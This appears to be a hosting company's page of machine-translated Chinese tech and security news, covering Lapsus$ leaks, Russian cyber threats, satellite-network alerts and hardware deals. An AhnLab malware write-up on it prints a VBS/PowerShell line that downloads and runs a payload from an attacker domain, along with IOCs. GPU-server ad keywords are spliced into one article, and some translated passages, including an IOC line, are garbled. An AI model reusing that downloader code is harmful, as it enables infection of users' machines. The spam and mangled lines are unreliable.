已经找到“” 的记录998条
英国政府计划将资助颠覆性网络技术

英国数字、文化、媒体和体育部 (DCMS)宣布了一项竞赛,该竞赛将提供高达 1000 万英镑的资金来研究和开发Open RAN等颠覆性网络技术。

英国电信创新网络竞赛是价值 2.5 亿英镑的5G 供应链多元化战略的一部分,该战略旨在为寻求进入市场的公司创造安全和创新的电信供应链环境并降低壁垒。

该倡议将建立英国电信创新网络 (UKTIN) 中心,该中心将使新兴电信公司能够获得资金、合作者和测试设施,从而为英国的移动宽带网络开发新的和改进的技术。 

合作对于研发 Open RAN 尤为重要,它允许电信公司在构建或维护网络时混合和匹配设备,而不是依赖单一供应商。对 Open RAN 的推动尤其受到围绕华为的国家安全问题的推动,华为是英国5G网络设备的主要供应商,直到2020 年被英国网络基础设施禁止

然而,根据下议院科学技术委员会 2021 年的一份报告,这使得英国依赖两家海外电信公司作为 5G 供应商,这也对国家安全构成风险。

UKTIN 将由一个具有电信专业知识的组织组成的财团运营,该财团将通过竞争选出,并将充当“任何希望获得研发资金的电信公司的第一个停靠港,以及希望联手削减-边缘项目,”数字基础设施部长 Julia Lopez 周二表示。

“最终,这是为了让英国成为世界上为数字网络开发快速和无缝新技术的最佳地点,这将为我们的经济进入 21 世纪提供动力,”她补充道。

拥有两个或更多成员的英国财团今天可以通过提交两个交付计划来申请 UKTIN 竞赛的资金:一个最高预算为 500 万英镑,另一个最高预算为 1000 万英镑。然后,DCMS 官员将确定两个投标中的哪一个“最物有所值”。

申请可在 2022 年 5 月 20 日之前提交,中标者将在 2022 年 7 月收到通知。

来自:资讯
Okta正在调查Lapsus$集团的客户数据泄露索赔

身份验证服务和身份与访问管理 (IAM) 解决方案的领先提供商 Okta 表示,它正在调查有关数据泄露的索赔。

周二,数据勒索组织 Lapsus$ 在其 Telegram 频道中发布了据称是 Okta 客户数据的屏幕截图。

作为市值超过 60 亿美元的上市公司,Okta 在全球拥有超过 5,000 名员工,并为西门子、ITV、Pret a Manger、Starling Bank 等主要组织提供软件服务。

Lapsus$ 声称拥有 Okta 客户数据

数据勒索组织 Lapsus$ 声称已获得对 Okta.com 的“超级用户/管理员”访问权限,并访问了 Okta 的客户数据,如zzqidc所见:

Lapsus$ 声称已获得 Okta 客户数据(zzqidc)

“Okta 知道这些报道,目前正在调查,”Okta 发言人告诉zzqidc。

“随着更多信息的出现,我们将提供更新。”

正如zzqidc所见,Lapsus$ 共享的屏幕截图显示系统日期设置为 2022 年 1 月 21 日,这表明黑客可能发生在几个月前。

Okta 联合创始人兼首席执行官 Todd McKinnon 现在证实了这一点:

“我们相信网上分享的截图与今年 1 月的活动有关,”麦金农说。

“根据我们迄今为止的调查,除了 1 月份检测到的活动之外,没有证据表明正在进行恶意活动。”

该开发遵循 Lapsus$' 本周声称它违反了微软的内部 Azure DevOps 服务器。

周一,Lapsus$ 泄露了它声称的37 GB 被盗的 Bing、Cortana 和其他微软项目的源代码,微软证实它正在调查。

此外,该组织今天声称他们在一年内“第二次”违反了 LG 电子(LGE),尽管zzqidc尚未证实这一说法

Lapsus$ 此前曾泄露数千兆字节的专有数据,据称这些数据是从 三星、 英伟达和 Mercado Libre等领先公司窃取的,这些公司 本月证实它遭到了破坏。

像 Lapsus$ 泄露受害者这样的数据勒索组织,但与像勒索软件运营商那样加密机密文件不同,这些参与者窃取并保留受害者的专有数据,并在他们的勒索要求未得到满足时发布。

如果 Lapsus$ 声称违反 Okta 系统的说法被证明是准确的,那么仍有待查明 Okta 有多少客户受到影响以及影响程度如何。

美国东部时间 3 月 22 日凌晨 5:24 更新:添加了 Okta 首席执行官 McKinnon 的新声明。

来自:资讯
Lapsus$黑客泄露了微软的37GB源代码

Lapsus$ 黑客组织声称泄露了从微软内部 Azure DevOps 服务器窃取的 Bing、Cortana 和其他项目的源代码。

周日清晨,Lapsus$ 团伙在他们的 Telegram 频道上发布了一张截图,表明他们入侵了微软的 Azure DevOps 服务器,其中包含 Bing、Cortana 和其他各种内部项目的源代码。

周一晚上,黑客组织发布了一个 9 GB 7zip 档案的种子,其中包含他们认为属于微软的 250 多个项目的源代码。

在发布种子时,Lapsus$ 表示其中包含 90% 的 Bing 源代码以及大约 45% 的 Bing Maps 和 Cortana 代码。

尽管他们说只有部分源代码被泄露,但zzqidc被告知未压缩的存档包含大约 37GB 的源代码,据称属于微软。


泄露的源代码项目

仔细研究泄露文件的安全研究人员告诉zzqidc,它们似乎是来自微软的合法内部源代码。

此外,我们被告知,一些泄露的项目包含电子邮件和文档,这些电子邮件和文档显然被微软工程师在内部用于发布移动应用程序。

这些项目似乎是针对基于 Web 的基础设施、网站或移动应用程序,没有发布 Microsoft 桌面软件的源代码,包括 Windows、Windows Server 和 Microsoft Office。

当我们就今晚的源代码泄漏与微软联系时,他们继续告诉 BleepingComputer,他们知道这些说法并正在调查。

Lapsus$ 左右泄漏数据

Lapsus$ 是一个数据勒索黑客组织,它破坏公司系统以窃取源代码、客户列表、数据库和其他有价值的数据。然后,他们试图通过不公开泄露数据的赎金要求勒索受害者。

在过去的几个月里,Lapsus$ 披露了许多针对大公司的网络攻击,其中确认了针对 NVIDIA、  Samsung  Vodafone  Ubisoft和 Mercado Libre的攻击。

到目前为止,大多数攻击都针对源代码存储库,允许威胁参与者窃取敏感的专有数据,例如 NVIDIA 的精简哈希率 (LHR) 技术,该技术使显卡能够降低 GPU 的挖掘能力。

目前尚不清楚威胁行为者是如何破坏这些存储库的,但一些安全研究人员认为,他们正在向公司内部人员支付访问费用。

“从我的角度来看,他们继续通过公司内部人员获取访问权限,”威胁情报分析师 Tom Malka 告诉 BleepingComputer。

这个理论并不牵强,因为 Lapsus$ 此前曾宣布,他们愿意从员工那里购买网络访问权。

Lapsus$ 招聘企业内部人士

然而,它可能不止于此,因为 Lapsus$ 发布了他们访问他们声称是 Okta 内部网站的屏幕截图。由于 Okta 是一个身份验证和身份管理平台,如果 Lapsus$ 成功入侵该公司,他们可能会将其用作公司客户的跳板。

至于 Lapsus$,他们在 Telegram 上拥有大量追随者,主频道订阅人数超过 33,000,聊天频道订阅人数超过 8,000。

勒索组织使用他们非常活跃的 Telegram 频道来宣布新的泄密、攻击并与他们的粉丝聊天,他们似乎很享受这种恶名。

随着 RaidForums 数据泄露论坛的关闭,我们可能会看到该网站的许多常客现在在 Lapsus$ 的 Telegram 频道中进行互动。

目前,在 Lapsus$ 和他们的粉丝庆祝数据泄露的同时,我们可能会看到更多的违规行为。

来自:资讯
拜登总统警告俄罗斯探索报复网络攻击

美国总统乔·拜登(Joe Biden)透露“不断发展的情报表明,俄罗斯政府正在探索潜在的网络攻击选项”,并且对关键基础设施构成的风险如此之大,以至于数百个美国组织已就此事获得了机密简报。

总统表示,俄罗斯的任何行动都可能旨在报复美国在非法入侵乌克兰后实施的经济制裁,但他还强调,尚未发现具体威胁,也不确定是否会发生袭击。

尽管如此,拜登还是敦促私营部门尽快恢复其网络安全机构的秩序。

我们看到对关键基础设施的潜在网络攻击

拜登在一份关于我们国家网络安全的声明中说:“如果你还没有这样做,我敦促我们的私营部门合作伙伴立即通过实施我们在去年共同开发的最佳实践来加强你的网络防御。

负责网络和新兴技术的国家安全副顾问安妮·纽伯格在白宫记者团的讲话中强化了总统的讲话。

纽伯格比她的老板更可怕。

“我们现在看到的是一种不断发展的威胁情报,可以对关键基础设施进行潜在的网络攻击,”她说。“这引起了人们的注意,因为我们担心关键服务的潜在中断。”

如此担忧以至于上周拜登政府在提供给“数百家公司”的机密简报中分享了其情报,这些公司感觉在俄罗斯的视线之内。

“我们看到了一些准备活动,这就是我们在机密背景下与我们认为可能受到影响的公司分享的内容,”纽伯格说,然后将公开简报描述为对所有美国民众的进一步提高认识活动组织。

她说,公开简报是必要的,因为许多潜在目标尚未修复已知漏洞。纽伯格和拜登总统恳请各组织不要让俄罗斯在他们所谓的“未上锁的门”中漫步。

Neuberger 还讨论了俄罗斯非法入侵乌克兰的电子方面,并指出 Neuberger 还表示,美国继续观察俄罗斯对乌克兰的数字基础设施采取行动。然而,她不会将上周对卫星通信提供商 Viasat 和 Rosneft 的攻击归因于俄罗斯演员。

拜登总统和纽伯格总统都表示,如果受到攻击,美国将做出回应。

澳大利亚内政部长凯伦安德鲁斯同意美国对俄罗斯构成的威胁的评估。

“我今天可以确认,我们的情报机构一直在密切监视俄罗斯参与因入侵而发生的恶意网络安全事件,”安德鲁斯在悉尼的一次会议上说。“随着俄罗斯对乌克兰的侵略,一个可悲的现实是,全球网络威胁环境加剧,澳大利亚网络直接或无意遭受网络攻击的风险增加了。”

安德鲁斯还透露,去年澳大利亚政府卫生组织遭受了一次袭击,她愿意将其归咎于俄罗斯演员。

“出于操作安全原因,我无法公开披露这些事件的细节。但我可以确认,至少在一次攻击中,使用了 Ryuk 勒索软件变种——这是俄罗斯网络犯罪分子的一种已知策略。”

“如果认为普京或他的追随者的侵略野心仅限于乌克兰,那就太天真了,”她说。®

来自:资讯
(*.chm) 的恶意软件伪装成Windows帮助文件专门攻击韩国用户

ASEC 分析团队最近发现了伪装成 Windows 帮助文件 (*.chm) 的恶意软件的分布,专门针对韩国用户。CHM 文件是经过编译的 HTML 帮助文件,通过 Microsoft® HTML 帮助可执行程序执行。

最近发现的 CHM 文件在运行时会下载其他恶意文件。在此过程中会显示一个包含普通内容的窗口,诱使用户认为该文件可能不是恶意文件。

恶意软件被压缩并作为电子邮件附件分发,如下图所示。

图 1. 分布式电子邮件

随附的压缩文件包含一个 Word 文件和一个 RAR 文件。在 RAR 文件中,存在恶意文件 Guide.chm。

                                                         图 2. 压缩文件

图 3. 'Latest Info (Guide).rar' 中存在的 .chm 文件

Word 文件被加密,防止用户知道文件中的内容。假定内容旨在提示用户在同一压缩文件内运行 CHM 文件。

图 4. Word 文件

运行 Guide.chm 后,会出现以下帮助。此帮助的内容与https://mage.github.io/mage/中的内容相同。

图 5. 创建的帮助

在 CHM 文件中,MAGE User Guide.html 文件中存在一个特殊命令。该命令通过快捷方式自动运行。Click(); 功能。

图 6. MAGE User Guide.html 中的代码

运行命令后,将在 %USERPROFILE%\Links\ 文件夹中创建 Document.dat 和 Document.vbs。Document.dat 包含 Base64 编码的数据,解码后的数据保存在 Document.vbs 中。

图 7. 创建的脚本文件

之后,它添加到路径 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document 以便 VBS 文件可以连续运行。

图 8. 创建的注册表

Document.vbs 包含使用 powershell 下载附加文件的代码,如下所示。下载的文件作为 advupdate.exe 保存到 %tmp% 文件夹中并被执行。

Dim sh
Set sh=WScript.CreateObject("WScript.Shell")
sh.run "cmd /c powershell iwr -outf %tmp%\advupdate.exe hxxps://encorpost[.]com/post/post.php?type=1 & start %tmp%\advupdate.exe",0,false
Set sh=Nothing

目前,从 URL 下载的文件是无害的文件,但用户必须保持谨慎,因为已发现具有相同文件名的恶意软件。

迄今为止发现的相同类型的恶意软件如下。

压缩文件名 恶意 CHM 文件的名称
法院提交文件.zip 资产.chm
合同文件.zip 合同.chm
工资.zip 工资.chm
文件.zip 用于游戏服务器开发的 Nodejs.chm
表 1. 额外发现的恶意文件名称

“法庭提交文件.zip”文件,与前面解释的文件类似,包含一个文件文件和一个 RAR 文件。

图 9. 额外发现的恶意文件 1-1

CHM 文件也伪装成无害的帮助文件。Excel 文件也可以打开并检查,因为它没有加密。

图 10. 额外发现的恶意文件 1-2(左:运行时的 CHM 文件/右:运行时的 Excel 文件)

以文件名 Contract paper.zip 分发的压缩文件包含两个文档文件和一个 RAR 压缩文件(见下图)。这两个 Word 文件都是加密的,因此无法检查其中的内容。CHM 文件伪装成包含某些详细信息的无害帮助文件。

图 11. 额外发现的恶意文件 2-1

图 12. 额外发现的恶意文件 2-2(Word 文件)

图 13. 额外发现的恶意文件 2-3(CHM 文件)

运行额外发现的 .chm 文件时,脚本文件将被放入 %USERPROFILE%\Links\ 文件夹并添加运行密钥。之后,当脚本文件运行时,会下载额外的恶意文件,作为 advupdate.exe 保存到 %tmp% 文件夹中并执行。

以下是发现的下载 URL。

文件名 下载网址
用于游戏服务器开发的 Nodejs.chm hxxps://nhn-games[.]com/game03953/gamelist.php?type=1
工资.chm hxxps://sktelecom[.]help/download/select.php?type=1
用户指南.chm hxxps://sktelecom[.]help/download/select.php type=1
合同.chm hxxps://want-helper[.]com/database/db.php?type=1
资产.chm hxxps://want-helper[.]com/database/db.php?type=1
表 2. 其他下载 URL

近期,不断发现以压缩文件形式分发的恶意Windows帮助文件(*.chm)。看到压缩文件的名称和帮助文件的界面都是用韩文写的,攻击者的目标似乎是韩国用户。目前,单击下载 URL 会导致下载一个无害的可执行文件,因此无法检查最终下载的恶意软件究竟做了什么。但是,由于攻击者可能会将各种恶意软件菌株上传到 URL,因此用户必须始终小心。

AhnLab 的反恶意软件产品 V3 使用以下别名检测恶意软件。

【文件检测】
木马/CHM.Agent
下载器/CHM.Agent

[IOC]
3ae6503e836b295955a828a76ce2efa7(CHM)
d26481e376134dc14966ccab39b91f16(CHM)
997165ed836b8a2a6af5cf2d43af5803(CHM)
5f1091df4c74412ef59426c1bb65f4d0(CHM)
ae43f4d4c6123294b2f3ede294032944(CHM)
acc6263bd54de778c1e22373d73887ab(CHM)
hxxps:// encorpost COM /后/ post.php中类型= 1个[。]
hxxps:// nhn-games[.]com/game03953/gamelist.php?type=1
hxxps://sktelecom[.]help/download/select.php?type=1
hxxps://want-helper[.]com/database/ db.php?type=1

来自:资讯
谷歌海底电缆连接非洲并预计今年投入使用

谷歌透露,其 Equiano 海底电缆已在多哥洛美登陆,这是其在非洲大西洋沿岸的第一站。

该电缆于 2019 年首次宣布,将在葡萄牙非洲西海岸之间运行,连接多哥、尼日利亚、纳米比亚、南非和圣赫勒拿等国家。预计它将在今年晚些时候投入使用,其网络容量将比为该地区建造的最后一条电缆高出约 20 倍。

谷歌表示,多哥坚定致力于推动其数字经济发展,Equiano 的到来是该国持续数字化发展的关键一步。该电缆以尼日利亚出生的作家和废奴主义者奥拉达·埃奎亚诺的名字命名。

该公司指出,它委托进行的一项研究发现,该电缆有望在多哥带来更快的互联网速度、改善的用户体验和更低的互联网价格。它补充说,该国的互联网速度预计将从 2021 年的 10Mbps 翻倍至 2025 年的 21Mbps,而零售互联网价格预计将在同一时期下降 14%。该研究还发现,提高速度和降低价格有望提高互联网普及率,并且在 2022 年至 2025 年期间,在数字经济和外围行业增长的推动下,Equiano 应间接在该国创造 37,000 个新工作岗位。

“随着 Equiano 电缆在洛美的到来,我们期待帮助多哥实现数字化目标并加速数字化转型,不仅在该国,而且在整个非洲大陆,”谷歌非洲董事总经理 Nitin Gajria 说。

谷歌补充说,该电缆不仅可以提高网络的弹性,还可以帮助其他合作伙伴使用其容量并从中受益。它正在与多家主要电信运营商合作,例如法国兴业银行 (SIN) 和 CSquared,以确保电缆能够覆盖多哥和非洲大陆更广泛的更多企业和最终用户。
此前,谷歌在 10 月宣布将在五年内向非洲投资 10 亿美元,以帮助非洲大陆进行数字化转型。它希望该倡议将帮助非洲企业进行数字化转型,投资企业家以刺激下一代技术,并支持非营利组织改善非洲大陆的生活。

来自:资讯
美光科技正在为高需求应用设计AMD第三代Epyc的CPU服务器

美光科技现在正在使用 AMD新发布的第三代 Epyc 服务器 CPU 为其设计内存和存储芯片的大部分高需求应用程序提供动力。

AMD 负责 Epyc 产品管理的公司副总裁 Ram Peddibhotla 上周告诉The Register美光的决定,美光的一位发言人后来向我们证实,它最后将“大部分要求最高的”电子设计自动化应用程序转移到了配备 AMD CPU 的服务器上。年。

“他们拥有最先进的 EDA 高性能架构,可以让他们设计自己的产品 [并] 最大限度地提高设计师的生产力,”他说。

据 Peddibhotla 称,这使美光能够将 EDA 性能提高 30%,并且还降低了运行数据中心的前期和持续成本。

他补充说,美光现在正在测试配备 AMD 新 Epyc“Milan-X”处理器的服务器——该处理器于周一正式发布——并发现它们在特定 EDA 工作负载上比去年的第三代 EPYC 芯片提供了额外 40% 的性能提升,谢谢到 CPU 的 768MB 大型 L3 缓存。

“使用 [AMD 的第三代 Epyc] 真的非常好,而且使用 Milan-X 变得更好,”他说。

美光没有透露该公司之前用于其 EDA 数据中心的 CPU 架构,但值得我们关注的是,该公司并没有选择英特尔最新的至强处理器,如果 AMD 最新的性能比较可靠的话,这是可以理解的。作为内存和存储技术的主要供应商,美光去年带来了 277 亿美元的收入。®

Peddibhotla 表示,此举是芯片制造商与美光之间“长期合作”的一部分,其中还包括在美光的 DDR5 内存和 SSD 技术上验证 AMD 的产品。

“美光和 AMD 的共同愿景是为高性能数据中心平台提供领先的 DDR5 内存的全部功能,”英特尔前高管、现任美光计算和网络业务部门的 Raj Hazra 在一份固定声明中表示。

AMD 的新 Epyc Milan-X 芯片于周一推出,得益于该公司新的 3D V-Cache 技术,它包含一个巨大的 768MB L3 缓存,该技术使芯片制造商能够将处理器上的每组内核(也称为核心)的 L3 增加三倍。复杂的模具。这家芯片制造商表示,这对缓存敏感的应用程序产生了重大影响,即 EDA 等技术计算工作负载。®

来自:资讯
美国政府发出警告后,卫星通信网络处于警戒状态

美国联邦机构警告说,美国和国际卫星通信 (SATCOM) 网络可能受到的威胁可能会影响客户。

在联合安全警报中,美国网络安全和基础设施安全局 (CISA) 和 FBI “强烈鼓励”关键基础设施运营商以及 SATCOM 网络提供商和客户采取一系列缓解措施来支持他们的网络。

这些包括:

  • 在 SATCOM 设备的入口和出口点对异常流量实施额外监控。
  • 监控网络日志中的可疑活动以及未经授权或异常的登录尝试。
  • 使用强密码和其他身份验证方法,包括多因素身份验证。
  • 通过授权策略强制执行最低权限访问。
  • 审查与 IT 服务提供商的现有信任关系。
  • 在从 SATCOM 提供商租用或提供的所有通信链路上实施独立加密。
  • 创建和实施网络事件响应计划。

“鉴于当前的地缘政治形势,CISA 的Shields Up倡议要求所有组织大幅降低报告和共享恶意网络活动迹象的门槛,”该机构警告说。

该警报是在俄罗斯入侵乌克兰之日开始的针对卫星通信提供商 Viasat 的网络攻击之后发出的,此举显然摧毁了欧洲数以万计的 KA-SAT SATCOM 终端。Viasat 的 KA-SAT 鸟提供与英国、欧洲大陆、俄罗斯西部和土耳其的连接。Viasat 也是美国和英国的军事承包商。


停止噪音

根据新的 Orca Security报告,安全团队(仍然)因金融部门受到的打击最为严重而感到警觉疲劳。

这家云安全供应商对 5 个国家(美国英国法国德国澳大利亚)和 10 个行业的 813 名 IT 决策者进行了一项全球调查,发现 59% 的受访者每天收到超过 500 条公共云安全警报。 

对于金融机构的安全团队来说情况更糟:71% 的受访者每天看到超过 500 个此类警报,85% 的人打开了超过 500 个公共云警报,63% 的受访者表示他们花费了超过 20% 的时间每天查看警报并确定警报的优先级。

Orca 还发现孤立的安全工具使问题更加严重。它引用了使用五个或更多公共云安全工具的 87% 的受访者。最大的罪魁祸首是网络扫描工具 (84%) 和云平台原生安全工具 (82%)。

另一个有趣的片段:受访者对其安全工具的信心和满意度与他们所说的这些产品的实际性能之间的不一致。

几乎所有 (95%) 的人都表示他们对工具的准确性有信心或非常有信心,而 43% 的人表示超过 40% 的安全警报被证明是误报。97% 的受访者表示,他们对云安全产品确定风险优先级的能力感到满意或非常满意。但几乎一半 (49%) 表示超过 40% 的警报是低优先级的。

更多 Conti 泄漏分析,请

举手:还有谁因为无法停止滚动查看更多Conti 泄漏分析而失眠?

Check Point Research 在其对俄罗斯支持的勒索软件团伙的最新分析中,生成了一份特别有用的报告来说明成员和附属机构之间的通信是如何运作的。它允许查看者拖动用户节点以查看各个团队成员的连接以及他们在犯罪行动中发送给其他成员的消息量。

安全商店还讨论了 Conti 人力资源部门使用的招聘网站:俄语猎头服务,例如headhunter.ru和superjobs.ru,尽管 Check Point 指出 Conti 在后者方面的成功率较低。 

“你可能想知道‘为什么 headhunter.ru 提供这样的服务?’,答案是,他们没有,”威胁研究人员写道。“孔蒂只是简单地购买了软件,该软件未经许可就可以访问‘借来的’简历库,这似乎是网络犯罪界的标准做法。”

与此同时,安全监控公司北极狼表示,它使用Conti 泄漏与自己的暗网监控和勒索软件响应数据相结合,按地理位置量化 Conti 受害者。大多数(52%)的总部设在美国,其次是德国(9%)和英国(8%)。 

不容忽视的是,Forescout 的俄语网络安全研究人员也一直在关注 Conti 泄密事件,并于本周发布了一份 14 页的报告 [ PDF ]。

“根据安全公司的分析,其中一个 Conti 文件大致翻译为‘黑客的快速入门指南’”。

顾名思义,该文件为攻击网络和获得持久性提供了建议。Forescout 总结了三个要点:

  • 物联网设备是主要的初始攻击面。
  • RDP 被推荐为“初始后门”。
  • Active Directory/域控制器通常是实现持久性之前的主要目标。

“活动目录服务器最容易被利用:通常可以发现典型的错误配置,存在大量漏洞(例如 Zerologon)和默认启用的公共资源(例如默认网络共享),”报告说。“特别是,这样的公共资源不仅可以帮助普通员工完成日常工作,还可以让攻击者的工作变得更加轻松。”

Log4j 仍然是一个痛点

根据 Qualys 的最新研究,几乎三分之一 (30%) 的 Log4j 实例仍然容易受到攻击。

除了免费访问其平台 30 天之外,安全供应商还发布了一个新的开源 Log4j 扫描工具。

自 12 月 9 日披露影响 Apache 流行的基于 Java 的日志工具的漏洞以来已经过去了三个月。仅仅 72 小时后,网络犯罪分子就发起了近一百万次攻击尝试。

这家安全提供商表示,其端点检测和响应产品“在危机最严重的时候”每周检测到 22,000 次潜在攻击。

据 Qualys 称,总体而言,该漏洞在 2,800 多个 Web 应用程序中被检测到,并且大多数(超过 80%)是基于 Linux 的。

在美国、欧洲、中东和非洲的云工作负载和容器中发现了大约 68,000 个漏洞。超过一半的带有 Log4j 的应用程序被标记为“终止支持”,这意味着软件提供商不会提供安全补丁。

(Gh0st)令人畏惧的老鼠

根据韩国安全商店的博客,来自 AhnLab 的研究人员详细介绍了一种名为 Gh0stCringe 的远程访问木马 (RAT),它感染了 Microsoft SQL 和 MySQL,尤其是“具有易受攻击的帐户凭据的管理不善的数据库服务器” 。

Gh0stCringe,又名 CirenegRAT,基于 Gh0st RAT 的代码。

正如 Malwarebytes Labs指出的那样:“Gh0st RAT 源代码是公开发布的,因此我们已经看到了很多基于此代码的恶意软件。” 

最初的 Gh0st RAT 使用名为“Gh0st”的签名字符串与命令和控制服务器进行通信。 

建立通信后,较新的 Gh0stCringe RAT 可以执行任意数量的恶意行为,包括在用户不知情的情况下连接到特定的 URL、键盘记录、窃取信息、下载额外的有效负载和破坏数据。®

来自:资讯
美国通用动力与间谍情机构达成45亿美元的云基础设施交易

美国顶级航空航天和国防公司通用动力公司赢得了一项为期十年的合同,以改造美国国家地理空间情报局的云基础设施,交易价值高达 45 亿美元。

通用动力信息技术 (GDIT) 部门将构建混合云服务,结合商业云平台和本地数据中心。该基础设施将支持一系列功能,包括超级计算、虚拟桌面、DevOps 环境、平台即服务、通信服务以及跨情报机构位置的安全移动和无线网络。

在国防部的领导下,NGA 主要收集和分析地理空间卫星图像以协助执行作战任务。它还提供地理空间情报,以协助开展自然灾害和气候变化研究。 

2016 年,该机构宣布将在密苏里州圣路易斯建立一个校园,名为 Next NGA West 项目。随着 NGA 开始考虑建立数据中心来支持该设施,它在 2019 年宣布了“面向用户和数据中心服务”合同的细节。

现在,该合同已正式授予 GDIT。该决定于2021 年 12 月宣布,但在竞争对手 Leidos 向政府问责局抗议该交易时受到质疑。此后,Leidos撤回了投诉。

GDIT 将负责迁移现有的云数据、管理安全性以及启动和运行服务。

“我们为与 NGA 的长期合作伙伴关系感到自豪,并期待有机会继续利用我们的创新技术和服务组合来推进地理空间任务,”GDIT 总裁 Amy Gilliland在一份声明中表示®

来自:资讯
Supermicro新的GPU服务器提供了与硅技术一样GPU

周一宣布的 Supermicro 新的“通用 GPU”服务器提供了与硅技术一样平等的机会——它不区分 CPU、GPU、存储和网络技术。

boxen可以通过多种方式构建,包括来自 Intel 和 AMD 的处理器,以及来自 AMD 和 Nvidia 的图形加速器它可以进一步定制以包含专有技术,包括 Nvidia 的 NVLink 或 AMD 的 Infinity Fabric 互连,以连接多个 GPU。罗马尼亚显卡服务器  德国显卡服务器  法国GPU显卡服务器  欧洲混合GPU服务器(地区随机)  香港显卡服务器  匈牙利显卡服务器  委瑞内拉显卡服务器

数据中心级系统将采用 4U 或 5U 大小,具有基于开放计算项目建立的标准的“模块化”架构,例如 OCP 加速器模块 (OAM)。Supermicro 表示,模块化方法允许更经济的 CPU 和 GPU 升级,而无需更换整个系统。

该服务器显然是为高度依赖 GPU、内存和存储的人工智能等应用程序而构建的。对于那些不想使用像 Nvlink 这样的专有技术的人来说,该系统支持 PCIe 4.0,并将支持 PCIe 5.0,英特尔和 AMD 现在开始在他们的芯片中采用这种技术。快米云GPU服务器,韩国(B版)俄罗斯显卡服务器    美国显卡服务器    立陶宛显卡服务器    越南显卡服务器   印度显卡服务器      芬兰显卡服务器

该系统将支持 GPU,包括 AMD 的 Instinct MI250 GPU 或 Nvidia 的 A100 GPU,热容量为 700 瓦。

基本配置包括对每个封装最多 48 个内核的第三代 Intel Xeon 可扩展处理器或每个封装最多 64 个内核的第三代 AMD Epyc 部件的双插槽支持。

鉴于该服务器的面向未来的特性,假设该服务器将支持周一宣布的 AMD 新的Milan-X 芯片,以及英特尔即将推出的 Sapphire Rapids 芯片,其中包括可以增加更多计算能力的新封装。 GPU 服务器。

基于 AMD 和 Intel 的配置支持高达 8TB 的 DDR4 内存并具有 8 个 PCIe 4.0 插槽。鉴于该服务器的面向未来的特性,还假设该系统将支持 DDR5 内存。

扩展模块支持添加 1U 扩展模块以连接更多 GPU 或 PCIe 连接设备。荷兰显卡服务器加拿大/英国/德国/波兰保加利亚显卡服务器

AMD 配置支持四个 AMD MI250 或 Nvidia 的 HGX A100 GPU。英特尔系统仅支持 Nvidia 的 HGX A100 GPU,并且可以支持或 12TB 的英特尔傲腾持久内存。®

来自:资讯

客户热线:037125966675